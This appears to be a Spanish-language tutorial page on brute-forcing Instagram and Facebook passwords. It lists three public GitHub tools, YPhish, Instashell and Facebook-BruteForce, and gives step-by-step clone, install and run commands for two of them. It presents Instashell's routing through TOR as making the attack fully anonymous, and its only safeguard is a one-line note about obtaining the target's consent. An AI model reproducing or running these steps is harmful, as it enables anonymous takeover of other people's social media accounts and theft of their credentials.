🔐Bruteforce a RRSS

Es un método utilizado para intentar descubrir contraseñas, claves de cifrado o credenciales de acceso a un sistema o cuenta, probando exhaustivamente todas las combinaciones de un diccionario.

Nota: Vamos a realizar fuerza bruta a redes sociales para conseguir datos sensibles como contraseñas, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo.

Bruteforce a Instagram y Facebook

Muchas de estas técnicas puede que no funcionen correctamente con las últimas actualizaciones de seguridad de las distintas aplicaciones.

Yphish

GitHub - thiagoaraujosec/YPhish: Herramienta para hacking a redes socialesGitHub

Es una herramienta muy sencilla en Python que nos permite hacer varias acciones, entre las que tiene fuerza bruta a varios servicios como redes sociales.

Instashell

GitHub - maxrooted/instashellGitHub

Instashell es una herramienta de bruteforce a Instagram, que además lo realiza a traves de TOR, siendo completamente anónimo. El diccionario por defecto contiene 39330 palabras, pero podemos utilizar el diccionario que queramos.

Empleo

git clone https://github.com/thelinuxchoice/instashell
cd instashell
chmod +x instashell.sh
service tor start
sudo ./instashell.sh

Facebook-BruteForce

GitHub - IAmBlackHacker/Facebook-BruteForce: Bruteforce attack on Facebook account using python scriptGitHub

Herramienta que nos permite hacer bruteforce a Facebook de manera muy simple. Tenemos que colocar el diccionario que queramos dentro de la carpeta con el nombre passwords.txt

Empleo

git clone https://github.com/IAmBlackHacker/Facebook-BruteForce
cd Facebook-BruteForce
python3 -m pip install requests bs4
python3 -m pip install mechanize
python3 fb.py